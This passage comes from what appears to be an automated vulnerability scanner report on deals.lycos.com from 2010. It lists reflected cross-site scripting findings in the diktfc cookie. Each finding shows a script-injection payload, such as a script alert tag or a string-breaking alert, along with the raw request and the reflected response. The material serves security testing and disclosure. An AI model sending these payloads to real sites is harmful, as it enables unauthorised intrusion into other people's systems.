Content-Type: text/html; charset=utf-8
Content-Length: 46132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/movies-music-books-178",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A40639";alert(1)//4ac5d608389"
});
</script>
...[SNIP]...

1.289. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ae8"><script>alert(1)</script>c9b7635a3ff was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/mp3-players-144 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A18ae8"><script>alert(1)</script>c9b7635a3ff; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/mp3-players-144&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A18ae8"><script>alert(1)</script>c9b7635a3ff&amp;cj=1" alt="tracker" />
...[SNIP]...

1.290. http://deals.lycos.com/deals/category/mp3-players-144 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7bdd"%3balert(1)//aecc2087a85 was submitted in the diktfc cookie. This input was echoed as d7bdd";alert(1)//aecc2087a85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/mp3-players-144 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7bdd"%3balert(1)//aecc2087a85; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/mp3-players-144",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7bdd";alert(1)//aecc2087a85"
});
</script>
...[SNIP]...

1.291. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52c09"%3balert(1)//5dd4415da8d was submitted in the diktfc cookie. This input was echoed as 52c09";alert(1)//5dd4415da8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/office-and-supplies-182 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52c09"%3balert(1)//5dd4415da8d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/office-and-supplies-182",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52c09";alert(1)//5dd4415da8d"
});
</script>
...[SNIP]...

1.292. http://deals.lycos.com/deals/category/office-and-supplies-182 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><script>alert(1)</script>9d30591a5a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/office-and-supplies-182 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d7f4"><script>alert(1)</script>9d30591a5a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/office-and-supplies-182&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d7f4"><script>alert(1)</script>9d30591a5a6&amp;cj=1" alt="tracker" />
...[SNIP]...

1.293. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97fa0"><script>alert(1)</script>22b63eeca5d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/pc-computers-47 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97fa0"><script>alert(1)</script>22b63eeca5d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/pc-computers-47&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97fa0"><script>alert(1)</script>22b63eeca5d&amp;cj=1" alt="tracker" />
...[SNIP]...

1.294. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e84"%3balert(1)//725b98a132d was submitted in the diktfc cookie. This input was echoed as b3e84";alert(1)//725b98a132d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/pc-computers-47 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3e84"%3balert(1)//725b98a132d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/pc-computers-47",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3e84";alert(1)//725b98a132d"
});
</script>
...[SNIP]...

1.295. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pets-221

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d65"%3balert(1)//18a8cd271fa was submitted in the diktfc cookie. This input was echoed as 92d65";alert(1)//18a8cd271fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/pets-221 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A92d65"%3balert(1)//18a8cd271fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/pets-221",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A92d65";alert(1)//18a8cd271fa"
});
</script>
...[SNIP]...

1.296. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pets-221

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89742"><script>alert(1)</script>b872a3a4dcc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/pets-221 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A89742"><script>alert(1)</script>b872a3a4dcc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/pets-221&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A89742"><script>alert(1)</script>b872a3a4dcc&amp;cj=1" alt="tracker" />
...[SNIP]...

1.297. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b12d"%3balert(1)//42efa8c45f1 was submitted in the diktfc cookie. This input was echoed as 3b12d";alert(1)//42efa8c45f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/sports-and-fitness-211 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b12d"%3balert(1)//42efa8c45f1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/sports-and-fitness-211",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b12d";alert(1)//42efa8c45f1"
});
</script>
...[SNIP]...

1.298. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d28"><script>alert(1)</script>cbdacb961cb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/sports-and-fitness-211 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A72d28"><script>alert(1)</script>cbdacb961cb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/sports-and-fitness-211&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A72d28"><script>alert(1)</script>cbdacb961cb&amp;cj=1" alt="tracker" />
...[SNIP]...

1.299. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd261"><script>alert(1)</script>061e5deae73 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/televisions-159 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd261"><script>alert(1)</script>061e5deae73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/televisions-159&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd261"><script>alert(1)</script>061e5deae73&amp;cj=1" alt="tracker" />
...[SNIP]...

